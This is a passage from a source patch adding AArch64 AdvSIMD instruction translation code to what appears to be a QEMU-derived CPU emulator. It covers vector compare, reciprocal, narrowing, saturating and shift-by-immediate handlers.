+ */ + cond = TCG_COND_LT; + do_cmop: + tcg_gen_setcondi_i64(tcg_ctx, cond, tcg_rd, tcg_rn, 0); + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); + break; + case 0x8: /* CMGT, CMGE */ + cond = u ? TCG_COND_GE : TCG_COND_GT; + goto do_cmop; + case 0x9: /* CMEQ, CMLE */ + cond = u ? TCG_COND_LE : TCG_COND_EQ; + goto do_cmop; + case 0xb: /* ABS, NEG */ + if (u) { + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rn); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GT, tcg_rd, tcg_rn, tcg_zero, + tcg_rn, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_zero); + } + break; + case 0x2f: /* FABS */ + gen_helper_vfp_absd(tcg_ctx, tcg_rd, tcg_rn); + break; + case 0x6f: /* FNEG */ + gen_helper_vfp_negd(tcg_ctx, tcg_rd, tcg_rn); + break; + case 0x7f: /* FSQRT */ + gen_helper_vfp_sqrtd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + break; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x1c: /* FCVTAS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_tosqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x5c: /* FCVTAU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_touqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x18: /* FRINTN */ + case 0x19: /* FRINTM */ + case 0x38: /* FRINTP */ + case 0x39: /* FRINTZ */ + case 0x58: /* FRINTA */ + case 0x79: /* FRINTI */ + gen_helper_rintd(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); + break; + case 0x59: /* FRINTX */ + gen_helper_rintd_exact(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); + break; + default: + g_assert_not_reached(); + } +} + +static void handle_2misc_fcmp_zero(DisasContext *s, int opcode, + bool is_scalar, bool is_u, 
bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = (size == 3); + TCGv_ptr fpst; + + if (!fp_access_check(s)) { + return; + } + + fpst = get_fpstatus_ptr(tcg_ctx); + + if (is_double) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + NeonGenTwoDoubleOPFn *genfn; + bool swap = false; + int pass; + + switch (opcode) { + case 0x2e: /* FCMLT (zero) */ + swap = true; + /* fallthrough */ + case 0x2c: /* FCMGT (zero) */ + genfn = gen_helper_neon_cgt_f64; + break; + case 0x2d: /* FCMEQ (zero) */ + genfn = gen_helper_neon_ceq_f64; + break; + case 0x6d: /* FCMLE (zero) */ + swap = true; + /* fall through */ + case 0x6c: /* FCMGE (zero) */ + genfn = gen_helper_neon_cge_f64; + break; + default: + g_assert_not_reached(); + } + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + read_vec_element(s, tcg_op, rn, pass, MO_64); + if (swap) { + genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); + } else { + genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); + } + write_vec_element(s, tcg_res, rd, pass, MO_64); + } + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_zero); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } else { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + NeonGenTwoSingleOPFn *genfn; + bool swap = false; + int pass, maxpasses; + + switch (opcode) { + case 0x2e: /* FCMLT (zero) */ + swap = true; + /* fall through */ + case 0x2c: /* FCMGT (zero) */ + genfn = gen_helper_neon_cgt_f32; + break; + case 0x2d: /* FCMEQ (zero) */ + genfn = gen_helper_neon_ceq_f32; + break; + case 0x6d: /* FCMLE (zero) */ + swap = true; + /* fall through */ + case 0x6c: /* FCMGE (zero) */ + genfn = gen_helper_neon_cge_f32; + break; + default: + g_assert_not_reached(); + } + + if 
(is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 4 : 2; + } + + for (pass = 0; pass < maxpasses; pass++) { + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + if (swap) { + genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); + } else { + genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); + } + if (is_scalar) { + write_fp_sreg(s, rd, tcg_res); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + } + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_zero); + tcg_temp_free_i32(tcg_ctx, tcg_op); + if (!is_q && !is_scalar) { + clear_vec_high(s, rd); + } + } + + tcg_temp_free_ptr(tcg_ctx, fpst); +} + +static void handle_2misc_reciprocal(DisasContext *s, int opcode, + bool is_scalar, bool is_u, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = (size == 3); + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + if (is_double) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + int pass; + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + read_vec_element(s, tcg_op, rn, pass, MO_64); + switch (opcode) { + case 0x3d: /* FRECPE */ + gen_helper_recpe_f64(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x3f: /* FRECPX */ + gen_helper_frecpx_f64(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x7d: /* FRSQRTE */ + gen_helper_rsqrte_f64(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + g_assert_not_reached(); + } + write_vec_element(s, tcg_res, rd, pass, MO_64); + } + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } else { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + int pass, maxpasses; + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 
4 : 2; + } + + for (pass = 0; pass < maxpasses; pass++) { + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + + switch (opcode) { + case 0x3c: /* URECPE */ + gen_helper_recpe_u32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x3d: /* FRECPE */ + gen_helper_recpe_f32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x3f: /* FRECPX */ + gen_helper_frecpx_f32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x7d: /* FRSQRTE */ + gen_helper_rsqrte_f32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + g_assert_not_reached(); + } + + if (is_scalar) { + write_fp_sreg(s, rd, tcg_res); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + } + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op); + if (!is_q && !is_scalar) { + clear_vec_high(s, rd); + } + } + tcg_temp_free_ptr(tcg_ctx, fpst); +} + +static void handle_2misc_narrow(DisasContext *s, bool scalar, + int opcode, bool u, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 2-reg-misc ops which are narrowing (so each 2*size element + * in the source becomes a size element in the destination). + */ + int pass; + TCGv_i32 tcg_res[2]; + int destelt = is_q ? 2 : 0; + int passes = scalar ? 
1 : 2; + + if (scalar) { + tcg_res[1] = tcg_const_i32(tcg_ctx, 0); + } + + for (pass = 0; pass < passes; pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + NeonGenNarrowFn *genfn = NULL; + NeonGenNarrowEnvFn *genenvfn = NULL; + + if (scalar) { + read_vec_element(s, tcg_op, rn, pass, size + 1); + } else { + read_vec_element(s, tcg_op, rn, pass, MO_64); + } + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + + switch (opcode) { + case 0x12: /* XTN, SQXTUN */ + { + static NeonGenNarrowFn * const xtnfns[3] = { + gen_helper_neon_narrow_u8, + gen_helper_neon_narrow_u16, + tcg_gen_trunc_i64_i32, + }; + static NeonGenNarrowEnvFn * const sqxtunfns[3] = { + gen_helper_neon_unarrow_sat8, + gen_helper_neon_unarrow_sat16, + gen_helper_neon_unarrow_sat32, + }; + if (u) { + genenvfn = sqxtunfns[size]; + } else { + genfn = xtnfns[size]; + } + break; + } + case 0x14: /* SQXTN, UQXTN */ + { + static NeonGenNarrowEnvFn * const fns[3][2] = { + { gen_helper_neon_narrow_sat_s8, + gen_helper_neon_narrow_sat_u8 }, + { gen_helper_neon_narrow_sat_s16, + gen_helper_neon_narrow_sat_u16 }, + { gen_helper_neon_narrow_sat_s32, + gen_helper_neon_narrow_sat_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x16: /* FCVTN, FCVTN2 */ + /* 32 bit to 16 bit or 64 bit to 32 bit float conversion */ + if (size == 2) { + gen_helper_vfp_fcvtsd(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); + } else { + TCGv_i32 tcg_lo = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_hi = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_lo, tcg_op); + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_lo, tcg_lo, tcg_ctx->cpu_env); + tcg_gen_shri_i64(tcg_ctx, tcg_op, tcg_op, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_hi, tcg_op); + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_hi, tcg_hi, tcg_ctx->cpu_env); + tcg_gen_deposit_i32(tcg_ctx, tcg_res[pass], tcg_lo, tcg_hi, 16, 16); + tcg_temp_free_i32(tcg_ctx, tcg_lo); + tcg_temp_free_i32(tcg_ctx, tcg_hi); + } + break; + case 0x56: /* FCVTXN, FCVTXN2 */ + /* 64 
bit to 32 bit float conversion + * with von Neumann rounding (round to odd) + */ + assert(size == 2); + gen_helper_fcvtx_f64_to_f32(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); + break; + default: + g_assert_not_reached(); + } + + if (genfn) { + genfn(tcg_ctx, tcg_res[pass], tcg_op); + } else if (genenvfn) { + genenvfn(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_op); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, destelt + pass, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* Remaining saturating accumulating ops */ +static void handle_2misc_satacc(DisasContext *s, bool is_scalar, bool is_u, + bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = (size == 3); + + if (is_double) { + TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + int pass; + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + read_vec_element(s, tcg_rn, rn, pass, MO_64); + read_vec_element(s, tcg_rd, rd, pass, MO_64); + + if (is_u) { /* USQADD */ + gen_helper_neon_uqadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + } else { /* SUQADD */ + gen_helper_neon_sqadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + } + write_vec_element(s, tcg_rd, rd, pass, MO_64); + } + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + } else { + TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + int pass, maxpasses; + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 
4 : 2; + } + + for (pass = 0; pass < maxpasses; pass++) { + if (is_scalar) { + read_vec_element_i32(s, tcg_rn, rn, pass, size); + read_vec_element_i32(s, tcg_rd, rd, pass, size); + } else { + read_vec_element_i32(s, tcg_rn, rn, pass, MO_32); + read_vec_element_i32(s, tcg_rd, rd, pass, MO_32); + } + + if (is_u) { /* USQADD */ + switch (size) { + case 0: + gen_helper_neon_uqadd_s8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 1: + gen_helper_neon_uqadd_s16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 2: + gen_helper_neon_uqadd_s32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + default: + g_assert_not_reached(); + } + } else { /* SUQADD */ + switch (size) { + case 0: + gen_helper_neon_sqadd_u8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 1: + gen_helper_neon_sqadd_u16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + case 2: + gen_helper_neon_sqadd_u32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); + break; + default: + g_assert_not_reached(); + } + } + + if (is_scalar) { + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + write_vec_element(s, tcg_zero, rd, 0, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_zero); + } + write_vec_element_i32(s, tcg_rd, rd, pass, MO_32); + } + + if (!is_q) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i32(tcg_ctx, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rn); + } +} + +/* C3.6.12 AdvSIMD scalar two reg misc + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 1 | U | 1 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | + * +-----+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_scalar_two_reg_misc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 12, 5); + int size = extract32(insn, 22, 2); 
+ bool u = extract32(insn, 29, 1); + bool is_fcvt = false; + int rmode; + TCGv_i32 tcg_rmode; + TCGv_ptr tcg_fpstatus; + + switch (opcode) { + case 0x3: /* USQADD / SUQADD*/ + if (!fp_access_check(s)) { + return; + } + handle_2misc_satacc(s, true, u, false, size, rn, rd); + return; + case 0x7: /* SQABS / SQNEG */ + break; + case 0xa: /* CMLT */ + if (u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x8: /* CMGT, CMGE */ + case 0x9: /* CMEQ, CMLE */ + case 0xb: /* ABS, NEG */ + if (size != 3) { + unallocated_encoding(s); + return; + } + break; + case 0x12: /* SQXTUN */ + if (!u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x14: /* SQXTN, UQXTN */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_narrow(s, true, opcode, u, false, size, rn, rd); + return; + case 0x0c: case 0x0d: case 0x0e: case 0x0f: + case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: + case 0x1f: + /* Floating point: U, size[1] and opcode indicate operation; + * size[0] indicates single or double precision. + */ + opcode |= (extract32(size, 1, 1) << 5) | (u << 6); + size = extract32(size, 0, 1) ? 
3 : 2; + switch (opcode) { + case 0x2c: /* FCMGT (zero) */ + case 0x2d: /* FCMEQ (zero) */ + case 0x2e: /* FCMLT (zero) */ + case 0x6c: /* FCMGE (zero) */ + case 0x6d: /* FCMLE (zero) */ + handle_2misc_fcmp_zero(s, opcode, true, u, true, size, rn, rd); + return; + case 0x1d: /* SCVTF */ + case 0x5d: /* UCVTF */ + { + bool is_signed = (opcode == 0x1d); + if (!fp_access_check(s)) { + return; + } + handle_simd_intfp_conv(s, rd, rn, 1, is_signed, 0, size); + return; + } + case 0x3d: /* FRECPE */ + case 0x3f: /* FRECPX */ + case 0x7d: /* FRSQRTE */ + if (!fp_access_check(s)) { + return; + } + handle_2misc_reciprocal(s, opcode, true, u, true, size, rn, rd); + return; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + is_fcvt = true; + rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); + break; + case 0x1c: /* FCVTAS */ + case 0x5c: /* FCVTAU */ + /* TIEAWAY doesn't fit in the usual rounding mode encoding */ + is_fcvt = true; + rmode = FPROUNDING_TIEAWAY; + break; + case 0x56: /* FCVTXN, FCVTXN2 */ + if (size == 2) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_narrow(s, true, opcode, u, false, size - 1, rn, rd); + return; + default: + unallocated_encoding(s); + return; + } + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (is_fcvt) { + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_fpstatus = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_I32(tcg_rmode); + TCGV_UNUSED_PTR(tcg_fpstatus); + } + + if (size == 3) { + TCGv_i64 tcg_rn = read_fp_dreg(s, rn); + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + + handle_2misc_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rmode, tcg_fpstatus); + write_fp_dreg(s, 
rd, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + } else { + TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_rn, rn, 0, size); + + switch (opcode) { + case 0x7: /* SQABS, SQNEG */ + { + NeonGenOneOpEnvFn *genfn; + static NeonGenOneOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, + { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, + { gen_helper_neon_qabs_s32, gen_helper_neon_qneg_s32 }, + }; + genfn = fns[size][u]; + genfn(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); + break; + } + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x1c: /* FCVTAS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_tosls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x5c: /* FCVTAU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_touls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + default: + g_assert_not_reached(); + } + + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rn); + } + + if (is_fcvt) { + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); + } +} + +/* SSHR[RA]/USHR[RA] - Vector shift right (optional rounding/accumulate) */ +static void handle_vec_simd_shri(DisasContext *s, bool is_q, bool is_u, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = 2 * (8 << size) - immhb; + bool accumulate = false; + bool round = 
false; + bool insert = false; + int dsize = is_q ? 128 : 64; + int esize = 8 << size; + int elements = dsize/esize; + TCGMemOp memop = size | (is_u ? 0 : MO_SIGN); + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + TCGv_i64 tcg_round; + int i; + + if (extract32(immh, 3, 1) && !is_q) { + unallocated_encoding(s); + return; + } + + if (size > 3 && !is_q) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + switch (opcode) { + case 0x02: /* SSRA / USRA (accumulate) */ + accumulate = true; + break; + case 0x04: /* SRSHR / URSHR (rounding) */ + round = true; + break; + case 0x06: /* SRSRA / URSRA (accum + rounding) */ + accumulate = round = true; + break; + case 0x08: /* SRI */ + insert = true; + break; + } + + if (round) { + uint64_t round_const = 1ULL << (shift - 1); + tcg_round = tcg_const_i64(tcg_ctx, round_const); + } else { + TCGV_UNUSED_I64(tcg_round); + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, memop); + if (accumulate || insert) { + read_vec_element(s, tcg_rd, rd, i, memop); + } + + if (insert) { + handle_shri_with_ins(tcg_ctx, tcg_rd, tcg_rn, size, shift); + } else { + handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round, + accumulate, is_u, size, shift); + } + + write_vec_element(s, tcg_rd, rd, i, size); + } + + if (!is_q) { + clear_vec_high(s, rd); + } + + if (round) { + tcg_temp_free_i64(tcg_ctx, tcg_round); + } +} + +/* SHL/SLI - Vector shift left */ +static void handle_vec_simd_shli(DisasContext *s, bool is_q, bool insert, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = immhb - (8 << size); + int dsize = is_q ? 
128 : 64; + int esize = 8 << size; + int elements = dsize/esize; + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + int i; + + if (extract32(immh, 3, 1) && !is_q) { + unallocated_encoding(s); + return; + } + + if (size > 3 && !is_q) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, size); + if (insert) { + read_vec_element(s, tcg_rd, rd, i, size); + } + + handle_shli_with_ins(tcg_ctx, tcg_rd, tcg_rn, insert, shift); + + write_vec_element(s, tcg_rd, rd, i, size); + } + + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* USHLL/SHLL - Vector shift left with widening */ +static void handle_vec_simd_wshli(DisasContext *s, bool is_q, bool is_u, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = immhb - (8 << size); + int dsize = 64; + int esize = 8 << size; + int elements = dsize/esize; + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + int i; + + if (size >= 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + /* For the LL variants the store is larger than the load, + * so if rd == rn we would overwrite parts of our input. + * So load everything right now and use shifts in the main loop. + */ + read_vec_element(s, tcg_rn, rn, is_q ? 
1 : 0, MO_64); + + for (i = 0; i < elements; i++) { + tcg_gen_shri_i64(tcg_ctx, tcg_rd, tcg_rn, i * esize); + ext_and_shift_reg(tcg_ctx, tcg_rd, tcg_rd, size | (!is_u << 2), 0); + tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, shift); + write_vec_element(s, tcg_rd, rd, i, size + 1); + } +} + +/* SHRN/RSHRN - Shift right with narrowing (and potential rounding) */ +static void handle_vec_simd_shrn(DisasContext *s, bool is_q, + int immh, int immb, int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int immhb = immh << 3 | immb; + int size = 32 - clz32(immh) - 1; + int dsize = 64; + int esize = 8 << size; + int elements = dsize/esize; + int shift = (2 * esize) - immhb; + bool round = extract32(opcode, 0, 1); + TCGv_i64 tcg_rn, tcg_rd, tcg_final; + TCGv_i64 tcg_round; + int i; + + if (extract32(immh, 3, 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_rn = tcg_temp_new_i64(tcg_ctx); + tcg_rd = tcg_temp_new_i64(tcg_ctx); + tcg_final = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tcg_final, rd, is_q ? 
1 : 0, MO_64); + + if (round) { + uint64_t round_const = 1ULL << (shift - 1); + tcg_round = tcg_const_i64(tcg_ctx, round_const); + } else { + TCGV_UNUSED_I64(tcg_round); + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, size+1); + handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round, + false, true, size+1, shift); + + tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); + } + + if (!is_q) { + clear_vec_high(s, rd); + write_vec_element(s, tcg_final, rd, 0, MO_64); + } else { + write_vec_element(s, tcg_final, rd, 1, MO_64); + } + + if (round) { + tcg_temp_free_i64(tcg_ctx, tcg_round); + } + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_final); + return; +} + + +/* C3.6.14 AdvSIMD shift by immediate + * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 + * +---+---+---+-------------+------+------+--------+---+------+------+ + * | 0 | Q | U | 0 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | + * +---+---+---+-------------+------+------+--------+---+------+------+ + */ +static void disas_simd_shift_imm(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 11, 5); + int immb = extract32(insn, 16, 3); + int immh = extract32(insn, 19, 4); + bool is_u = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + + switch (opcode) { + case 0x08: /* SRI */ + if (!is_u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x00: /* SSHR / USHR */ + case 0x02: /* SSRA / USRA (accumulate) */ + case 0x04: /* SRSHR / URSHR (rounding) */ + case 0x06: /* SRSRA / URSRA (accum + rounding) */ + handle_vec_simd_shri(s, is_q, is_u, immh, immb, opcode, rn, rd); + break; + case 0x0a: /* SHL / SLI */ + handle_vec_simd_shli(s, is_q, is_u, immh, immb, opcode, rn, rd); + break; + case 0x10: /* SHRN */ + case 0x11: /* RSHRN / SQRSHRUN */ + if (is_u) { + handle_vec_simd_sqshrn(s, false, 
is_q, false, true, immh, immb, + opcode, rn, rd); + } else { + handle_vec_simd_shrn(s, is_q, immh, immb, opcode, rn, rd); + } + break; + case 0x12: /* SQSHRN / UQSHRN */ + case 0x13: /* SQRSHRN / UQRSHRN */ + handle_vec_simd_sqshrn(s, false, is_q, is_u, is_u, immh, immb, + opcode, rn, rd); + break; + case 0x14: /* SSHLL / USHLL */ + handle_vec_simd_wshli(s, is_q, is_u, immh, immb, opcode, rn, rd); + break; + case 0x1c: /* SCVTF / UCVTF */ + handle_simd_shift_intfp_conv(s, false, is_q, is_u, immh, immb, + opcode, rn, rd); + break; + case 0xc: /* SQSHLU */ + if (!is_u) { + unallocated_encoding(s); + return; + } + handle_simd_qshl(s, false, is_q, false, true, immh, immb, rn, rd); + break; + case 0xe: /* SQSHL, UQSHL */ + handle_simd_qshl(s, false, is_q, is_u, is_u, immh, immb, rn, rd); + break; + case 0x1f: /* FCVTZS/ FCVTZU */ + handle_simd_shift_fpint_conv(s, false, is_q, is_u, immh, immb, rn, rd); + return; + default: + unallocated_encoding(s); + return; + } +} + +/* Generate code to do a "long" addition or subtraction, ie one done in + * TCGv_i64 on vector lanes twice the width specified by size. 
 */
